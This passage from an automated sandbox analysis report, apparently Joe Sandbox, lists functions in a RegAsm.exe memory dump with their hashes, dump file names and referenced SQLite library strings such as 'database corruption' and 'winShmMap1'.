String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 2708a4fdfae49860d64d92eb414800eb52aea12cd8cdd78d9182369abf04b70e
Instruction ID: 7501e991ce302ecc26862b322f48400002932af91f5176b28350abdc61c60123
Opcode Fuzzy Hash: 2708a4fdfae49860d64d92eb414800eb52aea12cd8cdd78d9182369abf04b70e
Instruction Fuzzy Hash: F471F272A083458BDB00DF54D8C16AA7BE0EF44318FDC199AEC85CBA82E735E845C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C37D30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

winShmMap3, xrefs: 19C37F1D
winShmMap1, xrefs: 19C37DC5
winShmMap2, xrefs: 19C37E1F

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: winShmMap1$winShmMap2$winShmMap3
API String ID: 0-3826999013
Opcode ID: 5c92ac7f7261e161e5240ad90c4604f65f2143680761de13e70da8f97fd6c6a2
Instruction ID: c5ac28703d01050b090e688994a858126f00496c75f09b0ef54423f1b3485596
Opcode Fuzzy Hash: 5c92ac7f7261e161e5240ad90c4604f65f2143680761de13e70da8f97fd6c6a2
Instruction Fuzzy Hash: 1B61EFB29007419FD710DF25EC85A27B7E9BF88346F49482DE9C697291EB30EA14CB52

Uniqueness

Uniqueness Score: -1.00%

Function 19DD0FC2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 189COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 19DD0FE7
CatchIt.LIBVCRUNTIME ref: 19DD10CD

Strings

RCC, xrefs: 19DD1001
MOC, xrefs: 19DD0FF9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 95f60021003fde4e3e36377dc5b68dc9493f30d4bab12ce6eaf3f3c7b9f9e168
Instruction ID: 30e05a4d4bbe68f9c003547d34f9ed334f10029e3409cf561e881f0b9b6e466f
Opcode Fuzzy Hash: 95f60021003fde4e3e36377dc5b68dc9493f30d4bab12ce6eaf3f3c7b9f9e168
Instruction Fuzzy Hash: B1416A71900289EFCF19DFA4DA81AAE7BB5FF48300F188159F90467691D735A950DB90

Uniqueness

Uniqueness Score: -1.00%

Function 19C34CE0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

temp, xrefs: 19CC3F91
wrong number of vtable arguments, xrefs: 19CC3FA9

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: temp$wrong number of vtable arguments
API String ID: 0-2849069181
Opcode ID: 15f1cb5f9eb377c93cfd88e87508221592dda29d087ee3c351b5ee1c3814e1ac
Instruction ID: 5d73c0a81b0b18cee2326ad5ce95868cd3ea41358c329a308e909e244117ed53
Opcode Fuzzy Hash: 15f1cb5f9eb377c93cfd88e87508221592dda29d087ee3c351b5ee1c3814e1ac
Instruction Fuzzy Hash: 2F51C4B69043458FC714CF18E84056AFBF1BF89704F888AADE4C657741D732EA4ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 19C635E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C635F9
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C635EA
misuse, xrefs: 19C635F4

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 839038eb671ee7456fa530b23f9fb534ea7071b0389e1eb81400bcfeab527c4b
Instruction ID: 6d2ecbd576cd5752b88a1e5d4dd510138de8de6be8e2d6fd679f82bfbe2296c8
Opcode Fuzzy Hash: 839038eb671ee7456fa530b23f9fb534ea7071b0389e1eb81400bcfeab527c4b
Instruction Fuzzy Hash: 9051D6F6A04311AFC7048F15E8C4A56BBA5FF44724F0D8568F8999B3A2E731E850CB91

Uniqueness

Uniqueness Score: -1.00%

Function 19CD96B0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19CD97EF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19CD97E0
database corruption, xrefs: 19CD97EA

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c5294d1d6d1dbc95b0ea8818ef1e54c473edf325663a43ef307abe58df4792e1
Instruction ID: cee5ad422a7ac07e65b2abcd9f2006cc4181e00b7c70bc03b8afaaa88adb2f8b
Opcode Fuzzy Hash: c5294d1d6d1dbc95b0ea8818ef1e54c473edf325663a43ef307abe58df4792e1
Instruction Fuzzy Hash: 6741267A2067908FD3218F78E4506D3FFF29F41211F1D48AAD3D58B692E222E486D3A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C30300 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON

Download Yara Rule

Strings

winWrite2, xrefs: 19C3043B
delayed %dms for lock/sharing conflict at line %d, xrefs: 19C303FF
winWrite1, xrefs: 19C3045E

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winWrite1$winWrite2
API String ID: 0-1808655853
Opcode ID: bb2ad8bd17f2a3e81169479bcea2bca02e680f02f1c10537245f4dd49550f4f4
Instruction ID: 3f9b7e1b533c2395ba166618f75295e064e223ddc4489d14e0c5e188d1274080
Opcode Fuzzy Hash: bb2ad8bd17f2a3e81169479bcea2bca02e680f02f1c10537245f4dd49550f4f4
Instruction Fuzzy Hash: 4C412B73A043029FC744DF28EC85A6FB7D8EB88211FD8062AF596D62D1D731D3458BA2

Uniqueness

Uniqueness Score: -1.00%

Function 19DA5960 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19DA5985
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19DA5976
misuse, xrefs: 19DA5980

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 306e72be3f7b7717a526d20a519f20ff1472dbd05f72fc62c650b7d487c86189
Instruction ID: 61f628da1d38bed09408d5d9b9c4dc38c273cdb711a6a30d2ffdbf288b3f8a4b
Opcode Fuzzy Hash: 306e72be3f7b7717a526d20a519f20ff1472dbd05f72fc62c650b7d487c86189
Instruction Fuzzy Hash: F7413B75A003419FD300CB54DC80B9EB7F4AF84320FCD5529F984A7A81E329F9A4C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19DB8850 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 19DB88E2
delayed %dms for lock/sharing conflict at line %d, xrefs: 19DB895F

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 0-1037342196
Opcode ID: 71b1145b4f0f29c89a7520e5c6161d4ab0d240ce67ae5e527dce4507d486af96
Instruction ID: 9c6396c7d4c9bf2d5808db45ba2873226a2491f9a4690d3ed2a7f7821d331e5c
Opcode Fuzzy Hash: 71b1145b4f0f29c89a7520e5c6161d4ab0d240ce67ae5e527dce4507d486af96
Instruction Fuzzy Hash: DC213B74608386AFD7109B14D885BEBBBD9AFD4304F9C4C2DE58A86592C63598448393

Uniqueness

Uniqueness Score: -1.00%

Function 19C65390 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 117COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C6540D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C653FE
database corruption, xrefs: 19C65408

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: e5a2dd71ae61a2a56e63eab664eaf47ef222d1bee22ee6aac82370c33fda9b74
Instruction ID: 309dbf93204deb24e97049c315c8aa900bcf2580cff4dec5fb2ed4dd9c347c13
Opcode Fuzzy Hash: e5a2dd71ae61a2a56e63eab664eaf47ef222d1bee22ee6aac82370c33fda9b74
Instruction Fuzzy Hash: B531372B6447D146D7218F28F8807B6B7E09F61612F6C44AEE9C5C77E1E312E492C3B1

Uniqueness

Uniqueness Score: -1.00%

Function 19D47ED0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

error in tokenizer constructor, xrefs: 19D47F92
no such tokenizer: %s, xrefs: 19D47F1B

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: error in tokenizer constructor$no such tokenizer: %s
API String ID: 0-815501780
Opcode ID: a6c5cc0be6371f999d03fe3e1ee0ad0cb8d8efb9bcf5784e7d655092ea05a61d
Instruction ID: d61fd668d31640ce0c04088d6c8a30af1179c782a42a4d2bfac67445b611738c
Opcode Fuzzy Hash: a6c5cc0be6371f999d03fe3e1ee0ad0cb8d8efb9bcf5784e7d655092ea05a61d
Instruction Fuzzy Hash: 2631C1767042158FC720CF19D880A6AB3E4EF85665F29456DE989EBB40E732EC05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 19C2F000 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 19C2F0C4

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: 1fda54b2b7aa90554e9f5f527bacb954bc10b01958faf860bb2374a1cb39deae
Instruction ID: 29c4ef644f1daab906de81094f6382ffe6b17cdc464a1921b89225fe9ba24dd5
Opcode Fuzzy Hash: 1fda54b2b7aa90554e9f5f527bacb954bc10b01958faf860bb2374a1cb39deae
Instruction Fuzzy Hash: CB313AB79043079BC7109F15FC8161AB3A0BF00720FCC8629FCE5662D1EF32E9549692

Uniqueness

Uniqueness Score: -1.00%

Function 19C65280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19C65301
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19C652F2
database corruption, xrefs: 19C652FC

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 4707c1bb2599b340d16ee09b9342ad5f62eb7c200324a0791b5226c6f2b0b344
Instruction ID: 9c7180d8c441bc21ce78b180a52a7d6ab21e377c3659d5bcf9aedc37b5da9dd0
Opcode Fuzzy Hash: 4707c1bb2599b340d16ee09b9342ad5f62eb7c200324a0791b5226c6f2b0b344
Instruction Fuzzy Hash: 3211357B60020067CB105B58FC40CDBBFA5DFC42B6F5D4565FA4897222D623E921D3B2

Uniqueness

Uniqueness Score: -1.00%

Function 19C7D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 19C7D725

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19c20000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: f2130bce80fb6c96b3bb22fced906a4e9b5579187ad7b3711e4566dcc09313b2
Instruction ID: 60c06413c51b2cdd010dcd2fd94bd2a1d49b8f814069fa19c22fb84651a977ae
Opcode Fuzzy Hash: f2130bce80fb6c96b3bb22fced906a4e9b5579187ad7b3711e4566dcc09313b2
Instruction Fuzzy Hash: E8117F779002A0EBDB02AB68EC8CA5737ACFF8125AF084165F98CD6248D7359514C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19D46140 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

Strings

WITHOUT ROWID, xrefs: 19D46150, 19D46162
CREATE TABLE %Q.'%q_%q'(%s)%s, xrefs: 19D46175
fts5: error creating shadow table %q_%s: %s, xrefs: 19D46197

Memory Dump Source

Source File: 00000002.00000002.2059271950.0000000019C28000.00000020.00001000.00020000.00000000.sdmp, Offset: 19C20000, based on PE: true

Associated: 00000002.00000002.2059255663.0000000019C20000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019C21000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019D86000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059271950.0000000019E2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059807518.0000000019E38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059907360.0000000019E62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2059947888.0000000019E6A000.00000002.00001000.00020000.00000000.sdmpDownload File
